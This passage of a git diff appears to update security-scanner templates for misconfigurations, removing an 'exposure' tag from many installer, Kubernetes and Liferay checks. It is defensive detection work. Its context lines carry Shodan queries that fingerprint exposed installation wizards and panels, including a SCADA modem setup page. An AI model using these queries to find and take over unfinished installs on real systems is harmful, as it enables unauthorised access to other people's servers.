1 verified: true shodan-query: title:"Health Checks UI" - tags: misconfig,exposure + tags: misconfig http: - method: GET diff --git a/http/misconfiguration/hfs-exposure.yaml b/http/misconfiguration/hfs-exposure.yaml index d3617cf526..ee819cdd4a 100644 --- a/http/misconfiguration/hfs-exposure.yaml +++ b/http/misconfiguration/hfs-exposure.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"HFS /" - tags: misconfig,hfs,exposure + tags: misconfig,hfs http: - method: GET diff --git a/http/misconfiguration/ibm-friendly-path-exposure.yaml b/http/misconfiguration/ibm-friendly-path-exposure.yaml index 60a408ba10..8fa8f6f88c 100644 --- a/http/misconfiguration/ibm-friendly-path-exposure.yaml +++ b/http/misconfiguration/ibm-friendly-path-exposure.yaml @@ -10,7 +10,7 @@ info: metadata: max-request: 5 shodan-query: http.html:"IBM WebSphere Portal" - tags: ibm,exposure,websphere,misconfig + tags: ibm,websphere,misconfig http: - method: GET diff --git a/http/misconfiguration/ibm-websphere-xml.yaml b/http/misconfiguration/ibm-websphere-xml.yaml index f57d8a4dfa..10439762ed 100644 --- a/http/misconfiguration/ibm-websphere-xml.yaml +++ b/http/misconfiguration/ibm-websphere-xml.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 verified: true - tags: ibm,websphere,exposure,misconfig + tags: ibm,websphere,misconfig verified: "true" http: diff --git a/http/misconfiguration/installer/acunetix-360-installer.yaml b/http/misconfiguration/installer/acunetix-360-installer.yaml index 4d6a084e40..361ccb7f4d 100644 --- a/http/misconfiguration/installer/acunetix-360-installer.yaml +++ b/http/misconfiguration/installer/acunetix-360-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: http.favicon.hash:-347188002 - tags: misconfig,exposure,install,acunetix + tags: misconfig,install,acunetix http: - method: GET diff --git a/http/misconfiguration/installer/ampache-music-installer.yaml b/http/misconfiguration/installer/ampache-music-installer.yaml index 0535ad028f..75d3247c71 100644 --- a/http/misconfiguration/installer/ampache-music-installer.yaml +++ b/http/misconfiguration/installer/ampache-music-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"For the Love of Music - Installation" - tags: misconfig,ampache,install,exposure + tags: misconfig,ampache,install http: - method: GET diff --git a/http/misconfiguration/installer/bagisto-installer.yaml b/http/misconfiguration/installer/bagisto-installer.yaml index 2529333ecf..0166de9eed 100644 --- a/http/misconfiguration/installer/bagisto-installer.yaml +++ b/http/misconfiguration/installer/bagisto-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: http.title:"Bagisto Installer" - tags: misconfig,bagisto,install,exposure + tags: misconfig,bagisto,install http: - method: GET diff --git a/http/misconfiguration/installer/binom-installer.yaml b/http/misconfiguration/installer/binom-installer.yaml index 618165a29a..2cda21dc43 100644 --- a/http/misconfiguration/installer/binom-installer.yaml +++ b/http/misconfiguration/installer/binom-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 2 verified: true shodan-query: title:"Install Binom" - tags: misconfig,binom,install,exposure + tags: misconfig,binom,install http: - method: GET diff --git a/http/misconfiguration/installer/blesta-installer.yaml b/http/misconfiguration/installer/blesta-installer.yaml index fe7199aa13..68ea2b9f97 100644 --- a/http/misconfiguration/installer/blesta-installer.yaml +++ b/http/misconfiguration/installer/blesta-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: html:"Blesta installer" - tags: misconfig,blesta,install,exposure + tags: misconfig,blesta,install http: - method: GET diff --git a/http/misconfiguration/installer/circarlife-setup.yaml b/http/misconfiguration/installer/circarlife-setup.yaml index c867aede4c..1a274b2ac5 100644 --- a/http/misconfiguration/installer/circarlife-setup.yaml +++ b/http/misconfiguration/installer/circarlife-setup.yaml @@ -15,7 +15,7 @@ info: max-request: 1 verified: true shodan-query: title:"- setup" html:"Modem setup" - tags: scada,circontrol,circarlife,setup,exposure,panel,installer,misconfig + tags: scada,circontrol,circarlife,setup,panel,installer,misconfig http: - method: GET diff --git a/http/misconfiguration/installer/cloudcenter-Installer.yaml b/http/misconfiguration/installer/cloudcenter-Installer.yaml index 910f57c3eb..370aa88128 100644 --- a/http/misconfiguration/installer/cloudcenter-Installer.yaml +++ b/http/misconfiguration/installer/cloudcenter-Installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"CloudCenter Installer" - tags: misconfig,cisco,cloudcenter,install,exposure + tags: misconfig,cisco,cloudcenter,install http: - method: GET diff --git a/http/misconfiguration/installer/codeigniter-installer.yaml b/http/misconfiguration/installer/codeigniter-installer.yaml index e73562e35b..c57ab68c1c 100644 --- a/http/misconfiguration/installer/codeigniter-installer.yaml +++ b/http/misconfiguration/installer/codeigniter-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: http.title:"Codeigniter Application Installer" - tags: misconfig,codeigniter,install,exposure + tags: misconfig,codeigniter,install http: - method: GET diff --git a/http/misconfiguration/installer/concrete-installer.yaml b/http/misconfiguration/installer/concrete-installer.yaml index 0b33750992..0d0901d4d0 100644 --- a/http/misconfiguration/installer/concrete-installer.yaml +++ b/http/misconfiguration/installer/concrete-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Install concrete" - tags: misconfig,exposure,install,concrete + tags: misconfig,install,concrete http: - method: GET diff --git a/http/misconfiguration/installer/contentify-installer.yaml b/http/misconfiguration/installer/contentify-installer.yaml index 3dbb8f34c9..ce64c6b387 100644 --- a/http/misconfiguration/installer/contentify-installer.yaml +++ b/http/misconfiguration/installer/contentify-installer.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 1 verified: true - tags: misconfig,contentify,install,exposure + tags: misconfig,contentify,install http: - method: GET diff --git a/http/misconfiguration/installer/dokuwiki-installer.yaml b/http/misconfiguration/installer/dokuwiki-installer.yaml index 3cb902dba1..1a67a856f3 100644 --- a/http/misconfiguration/installer/dokuwiki-installer.yaml +++ b/http/misconfiguration/installer/dokuwiki-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"DokuWiki" - tags: misconfig,dokuwiki,install,exposure + tags: misconfig,dokuwiki,install http: - method: GET diff --git a/http/misconfiguration/installer/dolibarr-installer.yaml b/http/misconfiguration/installer/dolibarr-installer.yaml index 96a6232690..c3c43a9e3c 100644 --- a/http/misconfiguration/installer/dolibarr-installer.yaml +++ b/http/misconfiguration/installer/dolibarr-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Dolibarr install or upgrade" - tags: misconfig,exposure,install + tags: misconfig,install http: - method: GET diff --git a/http/misconfiguration/installer/eshop-installer.yaml b/http/misconfiguration/installer/eshop-installer.yaml index 46a67f0c76..93f1fa7639 100644 --- a/http/misconfiguration/installer/eshop-installer.yaml +++ b/http/misconfiguration/installer/eshop-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: html:"eShop Installer" - tags: misconfig,eshop,install,exposure + tags: misconfig,eshop,install http: - method: GET diff --git a/http/misconfiguration/installer/espeasy-installer.yaml b/http/misconfiguration/installer/espeasy-installer.yaml index b61c46ac71..2907943719 100644 --- a/http/misconfiguration/installer/espeasy-installer.yaml +++ b/http/misconfiguration/installer/espeasy-installer.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 1 verified: true - tags: misconfig,espeasy,install,exposure + tags: misconfig,espeasy,install http: - method: GET diff --git a/http/misconfiguration/installer/facturascripts-installer.yaml b/http/misconfiguration/installer/facturascripts-installer.yaml index b591c7d21d..8b7eee5e88 100644 --- a/http/misconfiguration/installer/facturascripts-installer.yaml +++ b/http/misconfiguration/installer/facturascripts-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: html:"FacturaScripts installer" - tags: misconfig,facturascripts,install,exposure + tags: misconfig,facturascripts,install http: - method: GET diff --git a/http/misconfiguration/installer/geniusocean-installer.yaml b/http/misconfiguration/installer/geniusocean-installer.yaml index 8946af1ba7..1aac71c445 100644 --- a/http/misconfiguration/installer/geniusocean-installer.yaml +++ b/http/misconfiguration/installer/geniusocean-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: html:"GeniusOcean Installer" - tags: misconfig,geniusocean,install,exposure + tags: misconfig,geniusocean,install http: - method: GET diff --git a/http/misconfiguration/installer/getsimple-installation.yaml b/http/misconfiguration/installer/getsimple-installation.yaml index ba766a1e3c..d5c8a39f86 100644 --- a/http/misconfiguration/installer/getsimple-installation.yaml +++ b/http/misconfiguration/installer/getsimple-installation.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-284 reference: - http://get-simple.info/ - tags: getsimple,exposure,installer,misconfig + tags: getsimple,installer,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/installer/gogs-installer.yaml b/http/misconfiguration/installer/gogs-installer.yaml index 0da4cef821..44fc2f4313 100644 --- a/http/misconfiguration/installer/gogs-installer.yaml +++ b/http/misconfiguration/installer/gogs-installer.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: http.title:"Installation - Gogs" - tags: misconfig,exposure,gogs,install + tags: misconfig,gogs,install http: - method: GET diff --git a/http/misconfiguration/installer/impresspages-installer.yaml b/http/misconfiguration/installer/impresspages-installer.yaml index 7340eadade..ed44cb73ba 100644 --- a/http/misconfiguration/installer/impresspages-installer.yaml +++ b/http/misconfiguration/installer/impresspages-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: http.title:"ImpressPages installation wizard" - tags: misconfig,exposure,install,impresspages + tags: misconfig,install,impresspages http: - method: GET diff --git a/http/misconfiguration/installer/lmszai-installer.yaml b/http/misconfiguration/installer/lmszai-installer.yaml index 7484b0ff0c..597755eed8 100644 --- a/http/misconfiguration/installer/lmszai-installer.yaml +++ b/http/misconfiguration/installer/lmszai-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: html:"LMSZAI - Learning Management System" - tags: misconfig,blesta,install,exposure + tags: misconfig,blesta,install http: - method: GET diff --git a/http/misconfiguration/installer/lychee-installer.yaml b/http/misconfiguration/installer/lychee-installer.yaml index 6ca930ddc4..44b9c9e79d 100644 --- a/http/misconfiguration/installer/lychee-installer.yaml +++ b/http/misconfiguration/installer/lychee-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: html:"Lychee-installer" - tags: misconfig,lychee,install,exposure + tags: misconfig,lychee,install http: - method: GET diff --git a/http/misconfiguration/installer/magento-installer.yaml b/http/misconfiguration/installer/magento-installer.yaml index 1d6da8466e..c116fd000f 100644 --- a/http/misconfiguration/installer/magento-installer.yaml +++ b/http/misconfiguration/installer/magento-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: html:"Magento Installation" - tags: misconfig,magento,install,exposure + tags: misconfig,magento,install http: - method: GET diff --git a/http/misconfiguration/installer/magnolia-installer.yaml b/http/misconfiguration/installer/magnolia-installer.yaml index 0b5a4315ca..3413470357 100644 --- a/http/misconfiguration/installer/magnolia-installer.yaml +++ b/http/misconfiguration/installer/magnolia-installer.yaml @@ -10,7 +10,7 @@ info: max-request: 1 verified: true shodan-query: title:"Magnolia Installation" - tags: magnolia,exposure,installer,misconfig + tags: magnolia,installer,misconfig http: - method: GET diff --git a/http/misconfiguration/installer/mcloud-installer.yaml b/http/misconfiguration/installer/mcloud-installer.yaml index 376263daad..6b469b7123 100644 --- a/http/misconfiguration/installer/mcloud-installer.yaml +++ b/http/misconfiguration/installer/mcloud-installer.yaml @@ -15,7 +15,7 @@ info: max-request: 1 verified: true shodan-query: http.title:"mcloud-installer-web" - tags: panel,mcloud,exposure,misconfig + tags: panel,mcloud,misconfig http: - method: GET diff --git a/http/misconfiguration/installer/moodle-installer.yaml b/http/misconfiguration/installer/moodle-installer.yaml index 5fafee21b0..c2ba14e021 100644 --- a/http/misconfiguration/installer/moodle-installer.yaml +++ b/http/misconfiguration/installer/moodle-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Installation Moodle" - tags: misconfig,moodle,install,exposure + tags: misconfig,moodle,install http: - method: GET diff --git a/http/misconfiguration/installer/nagiosxi-installer.yaml b/http/misconfiguration/installer/nagiosxi-installer.yaml index b7ae335ee1..1109a2ec96 100644 --- a/http/misconfiguration/installer/nagiosxi-installer.yaml +++ b/http/misconfiguration/installer/nagiosxi-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Nagios XI" - tags: misconfig,exposure,install,nagiosxi + tags: misconfig,install,nagiosxi http: - method: GET diff --git a/http/misconfiguration/installer/netsparker-enterprise-installer.yaml b/http/misconfiguration/installer/netsparker-enterprise-installer.yaml index d6fec0b55b..b5f38e3405 100644 --- a/http/misconfiguration/installer/netsparker-enterprise-installer.yaml +++ b/http/misconfiguration/installer/netsparker-enterprise-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: http.favicon.hash:-1575154882 - tags: misconfig,exposure,install,netsparker + tags: misconfig,install,netsparker http: - method: GET diff --git a/http/misconfiguration/installer/nginx-auto-installer.yaml b/http/misconfiguration/installer/nginx-auto-installer.yaml index ed36827ea6..3685a4663c 100644 --- a/http/misconfiguration/installer/nginx-auto-installer.yaml +++ b/http/misconfiguration/installer/nginx-auto-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"NginX Auto Installer" - tags: misconfig,nginx,install,exposure + tags: misconfig,nginx,install http: - method: GET diff --git a/http/misconfiguration/installer/nodebb-installer.yaml b/http/misconfiguration/installer/nodebb-installer.yaml index d8ec1bd66c..942a8bcd28 100644 --- a/http/misconfiguration/installer/nodebb-installer.yaml +++ b/http/misconfiguration/installer/nodebb-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"NodeBB Web Installer" - tags: misconfig,nodebb,install,exposure + tags: misconfig,nodebb,install http: - method: GET diff --git a/http/misconfiguration/installer/openmage-install.yaml b/http/misconfiguration/installer/openmage-install.yaml index 38c3a5aca5..5602f5a819 100644 --- a/http/misconfiguration/installer/openmage-install.yaml +++ b/http/misconfiguration/installer/openmage-install.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"OpenMage Installation Wizard" - tags: misconfig,openmage,install,exposure + tags: misconfig,openmage,install http: - method: GET diff --git a/http/misconfiguration/installer/opensis-installer.yaml b/http/misconfiguration/installer/opensis-installer.yaml index e06525b21c..cc0ce060e5 100644 --- a/http/misconfiguration/installer/opensis-installer.yaml +++ b/http/misconfiguration/installer/opensis-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"openSIS" - tags: misconfig,opensis,install,exposure + tags: misconfig,opensis,install http: - method: GET diff --git a/http/misconfiguration/installer/orangehrm-installer.yaml b/http/misconfiguration/installer/orangehrm-installer.yaml index 1a39e9b35d..be81cfb83a 100644 --- a/http/misconfiguration/installer/orangehrm-installer.yaml +++ b/http/misconfiguration/installer/orangehrm-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: http.title:"OrangeHRM Web Installation Wizard" - tags: misconfig,exposure,install,orangehrm + tags: misconfig,install,orangehrm http: - method: GET diff --git a/http/misconfiguration/installer/owncloud-installer-exposure.yaml b/http/misconfiguration/installer/owncloud-installer-exposure.yaml index 82f8fc4ddf..18bd404f45 100644 --- a/http/misconfiguration/installer/owncloud-installer-exposure.yaml +++ b/http/misconfiguration/installer/owncloud-installer-exposure.yaml @@ -8,7 +8,7 @@ info: max-request: 2 verified: true shodan-query: title:"owncloud" - tags: misconfig,owncloud,exposure,install + tags: misconfig,owncloud,install http: - method: GET diff --git a/http/misconfiguration/installer/oxid-eshop-installer.yaml b/http/misconfiguration/installer/oxid-eshop-installer.yaml index fd622b3ee1..ad7a32bd98 100644 --- a/http/misconfiguration/installer/oxid-eshop-installer.yaml +++ b/http/misconfiguration/installer/oxid-eshop-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"OXID eShop installation" - tags: misconfig,oxid,eshop,install,exposure + tags: misconfig,oxid,eshop,install http: - method: GET diff --git a/http/misconfiguration/installer/pagekit-installer.yaml b/http/misconfiguration/installer/pagekit-installer.yaml index b8bae2821e..7021a8e3ef 100644 --- a/http/misconfiguration/installer/pagekit-installer.yaml +++ b/http/misconfiguration/installer/pagekit-installer.yaml @@ -10,7 +10,7 @@ info: max-request: 1 verified: true shodan-query: title:"Pagekit Installer" - tags: misconfig,pagekit,install,exposure + tags: misconfig,pagekit,install http: - method: GET diff --git a/http/misconfiguration/installer/permissions-installer.yaml b/http/misconfiguration/installer/permissions-installer.yaml index a2a2b4264d..13f2963fc5 100644 --- a/http/misconfiguration/installer/permissions-installer.yaml +++ b/http/misconfiguration/installer/permissions-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:" Permissions | Installer" - tags: misconfig,permissions,install,exposure + tags: misconfig,permissions,install http: - method: GET diff --git a/http/misconfiguration/installer/phpbb-installer.yaml b/http/misconfiguration/installer/phpbb-installer.yaml index 65c3457828..cd086f4c55 100644 --- a/http/misconfiguration/installer/phpbb-installer.yaml +++ b/http/misconfiguration/installer/phpbb-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: html:"Installation Panel" - tags: misconfig,phpbb,install,exposure + tags: misconfig,phpbb,install http: - method: GET diff --git a/http/misconfiguration/installer/phpwind-installer.yaml b/http/misconfiguration/installer/phpwind-installer.yaml index 808b181e7d..e4a899bbb9 100644 --- a/http/misconfiguration/installer/phpwind-installer.yaml +++ b/http/misconfiguration/installer/phpwind-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Powered by phpwind" - tags: misconfig,phpwind,exposure,install + tags: misconfig,phpwind,install http: - method: GET diff --git a/http/misconfiguration/installer/pmm-installer.yaml b/http/misconfiguration/installer/pmm-installer.yaml index 71e36809b5..6e1d734ac5 100644 --- a/http/misconfiguration/installer/pmm-installer.yaml +++ b/http/misconfiguration/installer/pmm-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: http.title:"PMM Installation Wizard" - tags: misconfig,exposure,install,pmm + tags: misconfig,install,pmm http: - method: GET diff --git a/http/misconfiguration/installer/prestashop-installer.yaml b/http/misconfiguration/installer/prestashop-installer.yaml index 72f37583b1..12bc3aaf50 100644 --- a/http/misconfiguration/installer/prestashop-installer.yaml +++ b/http/misconfiguration/installer/prestashop-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"PrestaShop Installation Assistant" - tags: misconfig,prestashop,exposure,install + tags: misconfig,prestashop,install http: - method: GET diff --git a/http/misconfiguration/installer/processwire-installer.yaml b/http/misconfiguration/installer/processwire-installer.yaml index 15769013b2..de1206c72b 100644 --- a/http/misconfiguration/installer/processwire-installer.yaml +++ b/http/misconfiguration/installer/processwire-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 2 verified: true shodan-query: title:"ProcessWire 3.x Installer" - tags: misconfig,processwire,install,exposure + tags: misconfig,processwire,install http: - method: GET diff --git a/http/misconfiguration/installer/server-monitor-installer.yaml b/http/misconfiguration/installer/server-monitor-installer.yaml index 7b27e614f2..d95d49f985 100644 --- a/http/misconfiguration/installer/server-monitor-installer.yaml +++ b/http/misconfiguration/installer/server-monitor-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"SERVER MONITOR - Install" - tags: misconfig,monitor,exposure,install + tags: misconfig,monitor,install http: - method: GET diff --git a/http/misconfiguration/installer/smf-installer.yaml b/http/misconfiguration/installer/smf-installer.yaml index f5c08c5ac0..dd79cac71b 100644 --- a/http/misconfiguration/installer/smf-installer.yaml +++ b/http/misconfiguration/installer/smf-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"SMF Installer" - tags: misconfig,smf,install,exposure + tags: misconfig,smf,install http: - method: GET diff --git a/http/misconfiguration/installer/sumowebtools-installer.yaml b/http/misconfiguration/installer/sumowebtools-installer.yaml index dfb04eaf79..f363bf8e96 100644 --- a/http/misconfiguration/installer/sumowebtools-installer.yaml +++ b/http/misconfiguration/installer/sumowebtools-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"SumoWebTools Installer" - tags: misconfig,sumowebtools,install,exposure + tags: misconfig,sumowebtools,install http: - method: GET diff --git a/http/misconfiguration/installer/tasmota-install.yaml b/http/misconfiguration/installer/tasmota-install.yaml index b3307862ea..ed0a9aecbf 100644 --- a/http/misconfiguration/installer/tasmota-install.yaml +++ b/http/misconfiguration/installer/tasmota-install.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Tasmota" - tags: misconfig,tasmota,install,exposure + tags: misconfig,tasmota,install http: - method: GET diff --git a/http/misconfiguration/installer/testrail-install.yaml b/http/misconfiguration/installer/testrail-install.yaml index fddace6e3a..95ae9ab555 100644 --- a/http/misconfiguration/installer/testrail-install.yaml +++ b/http/misconfiguration/installer/testrail-install.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"TestRail Installation Wizard" - tags: misconfig,testrail,install,exposure + tags: misconfig,testrail,install http: - method: GET diff --git a/http/misconfiguration/installer/turbo-website-installer.yaml b/http/misconfiguration/installer/turbo-website-installer.yaml index e76ec30db6..2502b3d918 100644 --- a/http/misconfiguration/installer/turbo-website-installer.yaml +++ b/http/misconfiguration/installer/turbo-website-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Turbo Website Reviewer" - tags: turbo,misconfig,exposure,install + tags: turbo,misconfig,install http: - method: GET diff --git a/http/misconfiguration/installer/unifi-wizard-install.yaml b/http/misconfiguration/installer/unifi-wizard-install.yaml index f1ce3569be..297c7eb19a 100644 --- a/http/misconfiguration/installer/unifi-wizard-install.yaml +++ b/http/misconfiguration/installer/unifi-wizard-install.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"UniFi Wizard" - tags: misconfig,install,unifi,exposure + tags: misconfig,install,unifi http: - method: GET diff --git a/http/misconfiguration/installer/uvdesk-install.yaml b/http/misconfiguration/installer/uvdesk-install.yaml index 16603bf141..5fdabb0a7f 100644 --- a/http/misconfiguration/installer/uvdesk-install.yaml +++ b/http/misconfiguration/installer/uvdesk-install.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"UVDesk Helpdesk Community Edition - Installation Wizard" - tags: misconfig,uvdesk,install,exposure + tags: misconfig,uvdesk,install http: - method: GET diff --git a/http/misconfiguration/installer/vtiger-installer.yaml b/http/misconfiguration/installer/vtiger-installer.yaml index e4d11b1156..ee889c4313 100644 --- a/http/misconfiguration/installer/vtiger-installer.yaml +++ b/http/misconfiguration/installer/vtiger-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: html:"Welcome to Vtiger CRM" - tags: misconfig,vtiger,install,exposure + tags: misconfig,vtiger,install http: - method: GET diff --git a/http/misconfiguration/installer/webasyst-installer.yaml b/http/misconfiguration/installer/webasyst-installer.yaml index c84bf7530a..c94b150321 100644 --- a/http/misconfiguration/installer/webasyst-installer.yaml +++ b/http/misconfiguration/installer/webasyst-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: http.html:"Webasyst Installer" - tags: misconfig,webasyst,install,exposure + tags: misconfig,webasyst,install http: - method: GET diff --git a/http/misconfiguration/installer/webuzo-installer.yaml b/http/misconfiguration/installer/webuzo-installer.yaml index e575895e97..7d37a808da 100644 --- a/http/misconfiguration/installer/webuzo-installer.yaml +++ b/http/misconfiguration/installer/webuzo-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Webuzo Installer" - tags: misconfig,webuzo,install,exposure + tags: misconfig,webuzo,install http: - method: GET diff --git a/http/misconfiguration/iot-vdme-simulator.yaml b/http/misconfiguration/iot-vdme-simulator.yaml index 5635615a84..c8d292ccbc 100644 --- a/http/misconfiguration/iot-vdme-simulator.yaml +++ b/http/misconfiguration/iot-vdme-simulator.yaml @@ -14,7 +14,7 @@ info: max-request: 2 verified: true shodan-query: http.title:"IoT vDME Simulator" - tags: exposure,misconfig,panel + tags: misconfig,panel http: - method: GET diff --git a/http/misconfiguration/kubernetes/kube-state-metrics.yaml b/http/misconfiguration/kubernetes/kube-state-metrics.yaml index 25b0a450ac..9d6de5c290 100644 --- a/http/misconfiguration/kubernetes/kube-state-metrics.yaml +++ b/http/misconfiguration/kubernetes/kube-state-metrics.yaml @@ -10,7 +10,7 @@ info: max-request: 1 verified: true shodan-query: title:Kube-state-metrics - tags: misconfig,exposure,kube-state-metrics,k8s,kubernetes + tags: misconfig,kube-state-metrics,k8s,kubernetes http: - method: GET diff --git a/http/misconfiguration/kubernetes/kubernetes-metrics.yaml b/http/misconfiguration/kubernetes/kubernetes-metrics.yaml index 0a34a584e0..76935c7462 100644 --- a/http/misconfiguration/kubernetes/kubernetes-metrics.yaml +++ b/http/misconfiguration/kubernetes/kubernetes-metrics.yaml @@ -7,7 +7,7 @@ info: description: Information Disclosure of Garbage Collection reference: - https://kubernetes.io/docs/concepts/cluster-administration/system-metrics/#metrics-in-kubernetes - tags: kubernetes,exposure,devops,misconfig + tags: kubernetes,devops,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/kubernetes/kubernetes-resource-report.yaml b/http/misconfiguration/kubernetes/kubernetes-resource-report.yaml index bb0dd8de6c..5f385f3f38 100644 --- a/http/misconfiguration/kubernetes/kubernetes-resource-report.yaml +++ b/http/misconfiguration/kubernetes/kubernetes-resource-report.yaml @@ -5,7 +5,7 @@ info: author: pussycat0x severity: medium description: Information Disclosure of Kubernetes Resource Report - tags: kubernetes,exposure,misconfig + tags: kubernetes,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/libvirt-exporter-metrics.yaml b/http/misconfiguration/libvirt-exporter-metrics.yaml index 9202b6dd16..2700b97e1f 100644 --- a/http/misconfiguration/libvirt-exporter-metrics.yaml +++ b/http/misconfiguration/libvirt-exporter-metrics.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Libvirt" - tags: libvirt,exposure,debug,misconfig + tags: libvirt,debug,misconfig http: - method: GET diff --git a/http/misconfiguration/liferay/liferay-api.yaml b/http/misconfiguration/liferay/liferay-api.yaml index 40f0ada3b8..59691ffa5f 100644 --- a/http/misconfiguration/liferay/liferay-api.yaml +++ b/http/misconfiguration/liferay/liferay-api.yaml @@ -9,7 +9,7 @@ info: verified: true shodan-query: title:"Liferay" reference: https://github.com/ilmila/J2EEScan/blob/master/src/main/java/burp/j2ee/issues/impl/LiferayAPI.java - tags: liferay,exposure,api,misconfig + tags: liferay,api,misconfig http: - method: GET diff --git a/http/misconfiguration/liferay/liferay-axis.yaml b/http/misconfiguration/liferay/liferay-axis.yaml index 8a22f20eb8..39b44d81c2 100644 --- a/http/misconfiguration/liferay/liferay-axis.yaml +++ b/http/misconfiguration/liferay/liferay-axis.yaml @@ -9,7 +9,7 @@ info: max-request: 1 verified: true shodan-query: title:"Liferay" - tags: misconfig,exposure,liferay,api + tags: misconfig,liferay,api http: - method: GET diff --git a/http/misconfiguration/liferay/liferay-jsonws.yaml b/http/misconfiguration/liferay/liferay-jsonws.yaml index 7103a00be8..d44d3702ad 100644 --- a/http/misconfiguration/liferay/liferay-jsonws.yaml +++ b/http/misconfiguration/liferay/liferay-jsonws.yaml @@ -11,7 +11,7 @@ info: max-request: 1 verified: true shodan-query: title:"Liferay" - tags: liferay,exposure,api,misconfig + tags: liferay,api,misconfig http: - method: GET diff --git a/http/misconfiguration/linktap-gateway-exposure.yaml b/http/misconfiguration/linktap-gateway-exposure.yaml index 0869d4a2e4..cf8c7ceabc 100644 --- a/http/misconfiguration/linktap-gateway-exposure.yaml +++ b/http/misconfiguration/linktap-gateway-exposure.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"LinkTap Gateway" - tags: misconfig,linktap,iot,exposure + tags: misconfig,linktap,iot http: - method: GET diff --git a/http/misconfiguration/locust-exposure.yaml b/http/misconfiguration/locust-exposure.yaml index 1bb8313957..ab5df5d99a 100644 --- a/http/misconfiguration/locust-exposure.yaml +++ b/http/misconfiguration/locust-exposure.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Locust" - tags: exposure,locust,misconfig + tags: locust,misconfig http: - method: GET diff --git a/http/misconfiguration/lvm-exporter-metrics.yaml b/http/misconfiguration/lvm-exporter-metrics.yaml index 33c448eb6c..0ac14a1d8d 100644 --- a/http/misconfiguration/lvm-exporter-metrics.yaml +++ b/http/misconfiguration/lvm-exporter-metrics.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"LVM Exporter" - tags: lvm,exposure,debug,misconfig + tags: lvm,debug,misconfig http: - method: GET diff --git a/http/misconfiguration/mobiproxy-dashboard.yaml b/http/misconfiguration/mobiproxy-dashboard.yaml index 476af11cdc..91f1f3d049 100644 --- a/http/misconfiguration/mobiproxy-dashboard.yaml +++ b/http/misconfiguration/mobiproxy-dashboard.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: http.title:"MobiProxy" - tags: dashboard,exposure,mobiproxy,misconfig + tags: dashboard,mobiproxy,misconfig http: - method: GET diff --git a/http/misconfiguration/moleculer-microservices.yaml b/http/misconfiguration/moleculer-microservices.yaml index 13c926b0c8..c82f7d31b1 100644 --- a/http/misconfiguration/moleculer-microservices.yaml +++ 